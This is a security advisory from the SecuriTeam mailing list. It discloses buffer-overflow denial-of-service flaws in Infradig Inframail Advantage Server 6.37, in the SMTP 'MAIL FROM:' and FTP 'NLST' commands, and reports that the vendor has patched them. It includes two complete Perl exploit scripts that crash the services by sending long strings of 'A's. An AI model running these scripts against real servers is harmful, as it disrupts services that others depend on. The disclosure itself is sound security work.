The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Infradig Systems Inframail Advantage Server Multiple DoS
------------------------------------------------------------------------
SUMMARY
<http://www.infradig.com/> Infradig servers are "servers that support
SMTP, POP, IMAP, NNTP (NEWS), FTP, HTTP, WEBMAIL, WEBDAV, WAPMAIL, SIP,
mailing-lists, calendars and document sharing".
Lack of proper command filtering allows attackers to send a long string as
a command which in turn will cause a buffer overflow that will in turn
crash the Infradig server.
DETAILS
Vulnerable Systems:
* Infradig Systems Advantage Server Edition version 6.37
Immune Systems:
* Infradig Systems Advantage Server Edition version 7.2
The commands SMTP MAIL FROM: and FTP NLST vulnerable for buffer overflow.
Issuing the character 'A' 40960 times as an argument to MAIL FROM: command
will cause the ifmail.exe process to die and re-launch.
Issuing the character 'A' roughly 102400 times to the NLST command and
then issuing the character 'A' roughly 102400 times to the NLST command
again will cause all processes running under the ifmailsvc.exe process to
die and re-launch (these processes include slapd.exe, slurpd.exe,
ifmail.exe, ifweb.exe and otheres).
Vendor Status:
The vendor has released a patch for Infradig Systems Advantage Server
Edition.
Exploit:
Inframail_SMTPOverflow.pl
#===== Start Inframail_SMTPOverflow.pl =====
#
# Usage: Inframail_SMTPOverflow.pl <ip>
# Inframail_SMTPOverflow.pl 127.0.0.1
#
# Infradig Systems Inframail Advantage Server Edition 6.0
# (Version: 6.37)
#
# Download:
# http://www.infradig.com/
#
##############################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "25",
Proto => "TCP"))
{
print "Attempting to kill Inframail SMTP server at
$ARGV[0]:25...";
sleep(1);
print $socket "HELO moto.com\r\n";
sleep(1);
print $socket "MAIL FROM:" . "A" x 40960 . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:25\n";
}
# EOF
Inframail_FTPOverflow.pl
#
# Usage: Inframail_FTPOverflow.pl <ip>
# Inframail_FTPOverflow.pl 127.0.0.1
#
# Infradig Systems Inframail Advantage Server Edition 6.0
# (Version: 6.37)
#
# Download:
# http://www.infradig.com/
#
##############################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "21",
Proto => "TCP"))
{
print "Attempting to kill Inframail FTP server at $ARGV[0]:21...";
sleep(1);
print $socket "USER hello\r\n";
sleep(1);
print $socket "PASS moto\r\n";
sleep(1);
print $socket "NLST " . "A" x 102400 . "\r\n";
sleep(1);
print $socket "NLST " . "A" x 102400 . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:21\n";
}
#EOF
ADDITIONAL INFORMATION
The information has been provided by <mailto:reedarvin@gmail.com> Reed
Arvin.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
